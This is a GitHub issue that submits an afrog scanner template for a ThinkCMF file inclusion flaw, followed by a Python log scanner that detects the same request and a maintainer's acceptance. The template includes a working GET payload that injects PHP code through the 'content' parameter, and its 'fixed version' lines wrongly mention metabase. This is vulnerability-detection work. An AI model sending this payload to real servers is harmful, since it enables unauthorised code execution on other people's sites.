thinkcmf file inclusion #35

Open
rainbow2972 opened this issue Nov 7, 2022 · 1 comment
Labels
afrog-poc afrog poc issue submit


rainbow2972 commented Nov 7, 2022

id: thinkcmf-file-include

info:
  name: thinkCMF 文件包含
  author: rain
  severity: Critical
  description: |
    在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行
    影响版本:
      thinkCMFX 1.6.0-2.2.3
    修复版本:
      metabase version >= 0.40.5
      metabase version >= 1.40.5
  reference:
    - https://www.thinkcmf.com/

rules:
  r0:
    request:
      method: GET
      path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf))
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
    expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body)
expression: r0()

Reproduction

image
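
A defender-side check for the request shape used in rule r0 above, as an added example that is not part of the issue or of the afrog project: it scans web access logs for `a=fetch` requests carrying `templateFile` or `content`. The combined log format, the code-hint heuristic, the severity labels and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line and status of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Heuristic (assumed) for PHP code in the `content` parameter.
CODE_HINT_RE = re.compile(
    r"<\?|\b(?:die|eval|assert|system|md5|phpinfo|file_put_contents)\s*\(", re.I)

def classify(line):
    """Return a finding dict for requests shaped like rule r0, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes values, so encoded payloads are matched too.
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    if "fetch" not in [a.lower() for a in params.get("a", [])]:
        return None
    content = " ".join(params.get("content", []))
    if not content and "templateFile" not in params:
        return None
    status = int(m.group("status"))
    if CODE_HINT_RE.search(content):
        # Code-like content answered with 200 is the case rule r0 tests for.
        severity = "high" if status == 200 else "medium"
    else:
        severity = "low"
    return {"target": m.group("target"), "status": status, "severity": severity}

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not taken from the issue.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Nov/2022:10:00:01 +0000] "GET /?a=fetch&templateFile=public/index'
    '&prefix=%22&content=die(@md5(thinkcmf)) HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [07/Nov/2022:10:00:02 +0000] "GET /index.php?g=portal&m=index&a=index'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Nov/2022:10:00:03 +0000] "GET /?a=fetch&templateFile=public/index'
    ' HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Nov/2022:10:00:04 +0000] "GET /index.php?a=FETCH'
    '&content=%3C%3Fphp%20phpinfo()%3B HTTP/1.1" 500 0 "-" "curl/7.85.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"], finding["status"], finding["target"])
```

A "high" finding means a code-like `content` value was answered with status 200; confirm by checking whether the response body carried the evaluated output.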

zan8in (Owner) commented Nov 9, 2022

Thanks, it has been included.

@zan8in zan8in added the afrog-poc afrog poc issue submit label Nov 9, 2022